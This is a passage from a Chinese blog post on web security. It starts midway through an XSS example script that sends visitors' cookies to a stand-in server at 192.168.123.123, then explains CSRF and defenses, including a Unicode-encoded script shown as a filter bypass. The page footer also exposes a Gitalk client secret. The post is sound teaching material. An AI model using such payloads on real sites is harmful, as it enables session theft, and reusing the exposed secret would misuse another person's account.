hideFrame.src = xssURI;</span><br><span class="line"><span class="javascript">    <span class="comment">// 开工</span></span></span><br><span class="line"><span class="javascript">    <span class="built_in">document</span>.body.appendChild(hideFrame);</span></span><br><span class="line"><span class="javascript">&#125;)(<span class="built_in">window</span>, <span class="built_in">document</span>);</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>该段代码会将任何访问该帖子的用户的cookie传给一个为<code>http://192.168.123.123/myxss/</code>的服务器，该服务器可以拿着这个cookie访问对应的网站，并登录该用户的账号，继而可以进行其它操作。</p>
<p>因此，上面这段代码就是XSS。</p>
<h3 id="CSRF——跨站请求伪造"><a href="#CSRF——跨站请求伪造" class="headerlink" title="CSRF——跨站请求伪造"></a>CSRF——跨站请求伪造</h3><h4 id="介绍-1"><a href="#介绍-1" class="headerlink" title="介绍"></a>介绍</h4><p>CSRF，全称为<strong>Cross-site request forgery</strong>，中文名为跨站请求伪造。是一种让用户在当前已登录的Web应用程序上<strong>执行一些非本意的操作</strong>（如改名，删帖，发邮件等）的攻击方法。</p>
<h4 id="攻击原理"><a href="#攻击原理" class="headerlink" title="攻击原理"></a>攻击原理</h4><p>一般来说，CSRF是由XSS实现的，在跨站脚本的基础上，实现伪造请求，导致受害者会执行一些自己本不愿意执行的操作。</p>
<p><strong>注：CSRF也可以不通过XSS来实现。</strong></p>
<h4 id="示例-1"><a href="#示例-1" class="headerlink" title="示例"></a>示例</h4><p>还是以上面的对某论坛网站的XSS攻击为例，在外部服务器成功获得用户的cookie后，它可以利用cookie，伪造成用户对论坛网站发起一系列的请求，例如修改用户名称，修改用户密码等。此时，就可以称该攻击为CSRF。</p>
<h3 id="防范XSS和CSRF⭐️"><a href="#防范XSS和CSRF⭐️" class="headerlink" title="防范XSS和CSRF⭐️"></a>防范XSS和CSRF⭐️</h3><p><em><strong>核心思想：不相信任何外部来源数据！！！</strong></em></p>
<p>一般来说，大部分的CSRF都是基于XSS的，因此可以说防住了XSS，也就基本防住了CSRF。</p>
<p>对于防范XSS，主要有以下两个方法：</p>
<ol>
<li><strong>输入过滤：对外部输入进行彻底的敏感字符过滤</strong>——前端+后端</li>
<li><strong>输出过滤：在显示在页面上时，做一些处理让敏感的代码脚本无法顺利执行</strong>——前端</li>
</ol>
<p>理论上，只要有输入数据的的地方，就存在XSS的漏洞，JavaScript的脚本可以以各种形式（如明文、编码等）注入到数据库中。</p>
<p>就像上面提到的 JS 会以各种非法形式注入，其主要非法形式有两类：</p>
<ol>
<li><p><strong>明文：</strong></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript">  ... <span class="comment">// js 恶意代码</span></span></span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>​        要处理好明文注入的过滤。</p>
</li>
<li><p><strong>编码：</strong></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">u0026u006cu0074u003bu0073u0063u0072u0069u0070u0074u0026u0067u0074u003bu0061u006cu0065u0072u0074u0028u0026u0023u0033u0039u003bu6211u662fu0078u0073u0073uff0cu4f60u6709u9ebbu70e6u4e86u0026u0023u0033u0039u003bu0029u0026u006cu0074u003bu002fu0073u0063u0072u0069u0070u0074u0026u0067u0074u003b</span><br></pre></td></tr></table></figure>
<p>上面这个编码为unicode编码，它可以绕过<code>htmlSpecialChars</code>的过滤并入库，然后在展示该信息的时候，html 会自动将unicode编码转换成明文即真正的可执行脚本。</p>
<p>由于不仅unicode编码可以注入，其它类型的编码也可以（道理类似），我们需要尽量将页面的字符编码统一设置为一种（如unicode: utf-8），这样便于我们专注于处理unicode编码的注入。</p>
</li>
</ol>
<h4 id="其它一些通用的防范方法"><a href="#其它一些通用的防范方法" class="headerlink" title="其它一些通用的防范方法"></a>其它一些通用的防范方法</h4><ol>
<li><p>在输出html时，加上<code>Content Security Policy</code>的<code>Http Header</code></p>
<p>作用：防止页面被XSS攻击时，嵌入第三方的脚本文件</p>
</li>
<li><p>在设置Cookie时，加上<code>HttpOnly</code>参数</p>
<p>作用：可以防止页面被XSS攻击时，Cookie信息被盗取</p>
<p>缺点：网站本身的<code>JavaScript</code>代码也无法操作Cookie</p>
</li>
<li><p>在开发API时，检验请求的Referer参数</p>
<p>作用：可以在一定程度上防止CSRF攻击</p>
</li>
</ol>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/HTTP/" rel="tag"># HTTP</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/12/06/SessionTech/" rel="prev" title="会话技术">
      <i class="fa fa-chevron-left"></i> 会话技术
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/02/12/ReactHookIntroduction/" rel="next" title="初识 React Hook">
      初识 React Hook <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Network"><span class="nav-number">1.</span> <span class="nav-text">Network</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#HTTP%E5%8D%8F%E8%AE%AE%E7%AF%87"><span class="nav-number">1.1.</span> <span class="nav-text">HTTP协议篇</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AE%80%E4%BB%8B"><span class="nav-number">1.1.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#HTTP-1-0"><span class="nav-number">1.1.2.</span> <span class="nav-text">HTTP&#x2F;1.0</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AE%80%E4%BB%8B-1"><span class="nav-number">1.1.2.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%AF%B7%E6%B1%82%E6%A0%BC%E5%BC%8F"><span class="nav-number">1.1.2.2.</span> <span class="nav-text">请求格式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9B%9E%E5%BA%94%E6%A0%BC%E5%BC%8F"><span class="nav-number">1.1.2.3.</span> <span class="nav-text">回应格式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Content-Type-%E5%AD%97%E6%AE%B5"><span class="nav-number">1.1.2.4.</span> <span class="nav-text">Content-Type 字段</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Content-Encoding-%E5%AD%97%E6%AE%B5"><span class="nav-number">1.1.2.5.</span> <span class="nav-text">Content-Encoding 字段</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BC%BA%E7%82%B9"><span class="nav-number">1.1.2.6.</span> <span class="nav-text">缺点</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#HTTP-1-1"><span class="nav-number">1.1.3.</span> <span class="nav-text">HTTP&#x2F;1.1</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%8C%81%E4%B9%85%E8%BF%9E%E6%8E%A5"><span class="nav-number">1.1.3.1.</span> <span class="nav-text">持久连接</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AE%A1%E9%81%93%E6%9C%BA%E5%88%B6"><span class="nav-number">1.1.3.2.</span> <span class="nav-text">管道机制</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Content-Length-%E5%AD%97%E6%AE%B5"><span class="nav-number">1.1.3.3.</span> <span class="nav-text">Content-Length 字段</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%86%E5%9D%97%E4%BC%A0%E8%BE%93%E7%BC%96%E7%A0%81"><span class="nav-number">1.1.3.4.</span> <span class="nav-text">分块传输编码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%B6%E5%AE%83%E5%8A%9F%E8%83%BD"><span class="nav-number">1.1.3.5.</span> <span class="nav-text">其它功能</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BC%BA%E7%82%B9-1"><span class="nav-number">1.1.3.6.</span> <span class="nav-text">缺点</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#HTTP-2"><span class="nav-number">1.1.4.</span> <span class="nav-text">HTTP&#x2F;2</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%8D%8F%E8%AE%AE"><span class="nav-number">1.1.4.1.</span> <span class="nav-text">二进制协议</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%A4%9A%E5%B7%A5-Multiplexing"><span class="nav-number">1.1.4.2.</span> <span class="nav-text">多工 Multiplexing</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E6%B5%81"><span class="nav-number">1.1.4.3.</span> <span class="nav-text">数据流</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%A4%B4%E4%BF%A1%E6%81%AF%E5%8E%8B%E7%BC%A9"><span class="nav-number">1.1.4.4.</span> <span class="nav-text">头信息压缩</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%8E%A8%E9%80%81"><span class="nav-number">1.1.4.5.</span> <span class="nav-text">服务器推送</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HTTPS%E2%80%94%E2%80%94%E7%95%AA%E5%A4%96%E7%AF%87"><span class="nav-number">1.2.</span> <span class="nav-text">HTTPS——番外篇</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8HTTPS%E7%9A%84%E5%8E%9F%E5%9B%A0-amp-%E4%BD%9C%E7%94%A8"><span class="nav-number">1.2.1.</span> <span class="nav-text">使用HTTPS的原因&amp;作用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSL-TLS%E5%8D%8F%E8%AE%AE%E7%9A%84%E5%9F%BA%E6%9C%AC%E8%BF%90%E8%A1%8C%E8%BF%87%E7%A8%8B"><span class="nav-number">1.2.2.</span> <span class="nav-text">SSL&#x2F;TLS协议的基本运行过程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8F%A1%E6%89%8B%E9%98%B6%E6%AE%B5"><span class="nav-number">1.2.3.</span> <span class="nav-text">握手阶段</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%98%B6%E6%AE%B5%E4%B8%80%EF%BC%9A%E5%AE%A2%E6%88%B7%E7%AB%AF%E5%8F%91%E5%87%BA%E8%AF%B7%E6%B1%82"><span class="nav-number">1.2.3.1.</span> <span class="nav-text">阶段一：客户端发出请求</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%98%B6%E6%AE%B5%E4%BA%8C%EF%BC%9A%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%9B%9E%E5%BA%94"><span class="nav-number">1.2.3.2.</span> <span class="nav-text">阶段二：服务器回应</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%98%B6%E6%AE%B5%E4%B8%89%EF%BC%9A%E5%AE%A2%E6%88%B7%E7%AB%AF%E5%9B%9E%E5%BA%94"><span class="nav-number">1.2.3.3.</span> <span class="nav-text">阶段三：客户端回应</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%98%B6%E6%AE%B5%E5%9B%9B%EF%BC%9A%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%9C%80%E5%90%8E%E5%9B%9E%E5%BA%94"><span class="nav-number">1.2.3.4.</span> <span class="nav-text">阶段四：服务器最后回应</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AF%87"><span class="nav-number">1.3.</span> <span class="nav-text">网络安全篇</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS%E2%80%94%E2%80%94%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC"><span class="nav-number">1.3.1.</span> <span class="nav-text">XSS——跨站脚本</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.3.1.1.</span> <span class="nav-text">介绍</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A4%BA%E4%BE%8B"><span class="nav-number">1.3.1.2.</span> <span class="nav-text">示例</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF%E2%80%94%E2%80%94%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0"><span class="nav-number">1.3.2.</span> <span class="nav-text">CSRF——跨站请求伪造</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%8B%E7%BB%8D-1"><span class="nav-number">1.3.2.1.</span> <span class="nav-text">介绍</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="nav-number">1.3.2.2.</span> <span class="nav-text">攻击原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A4%BA%E4%BE%8B-1"><span class="nav-number">1.3.2.3.</span> <span class="nav-text">示例</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%98%B2%E8%8C%83XSS%E5%92%8CCSRF%E2%AD%90%EF%B8%8F"><span class="nav-number">1.3.3.</span> <span class="nav-text">防范XSS和CSRF⭐️</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%B6%E5%AE%83%E4%B8%80%E4%BA%9B%E9%80%9A%E7%94%A8%E7%9A%84%E9%98%B2%E8%8C%83%E6%96%B9%E6%B3%95"><span class="nav-number">1.3.3.1.</span> <span class="nav-text">其它一些通用的防范方法</span></a></li></ol></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Will"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Will</p>
  <div class="site-description" itemprop="description">心有猛虎，细嗅蔷薇</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">25</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Wizard-Guido" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Wizard-Guido" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        
  <div class="languages">
    <label class="lang-select-label">
      <i class="fa fa-language"></i>
      <span>简体中文</span>
      <i class="fa fa-angle-up" aria-hidden="true"></i>
    </label>
    <select class="lang-select" data-canonical="">
      
        <option value="zh-CN" data-href="/2021/12/06/HTTP&Network/" selected="">
          简体中文
        </option>
      
        <option value="en" data-href="/en/2021/12/06/HTTP&Network/" selected="">
          English
        </option>
      
    </select>
  </div>

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Will</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">121k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">1:50</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>
-->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : '665debbc9d743c5390af',
      clientSecret: '23bba36009506d4723ecd374cbf8d9c3cea1bb10',
      repo        : 'Wizard-Guido.github.io',
      owner       : 'Wizard-Guido',
      admin       : ['Wizard-Guido'],
      id          : 'ab7901f8e7b4b7838dc37646f05d76ca',
        language: 'zh-CN',
      distractionFreeMode: false
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
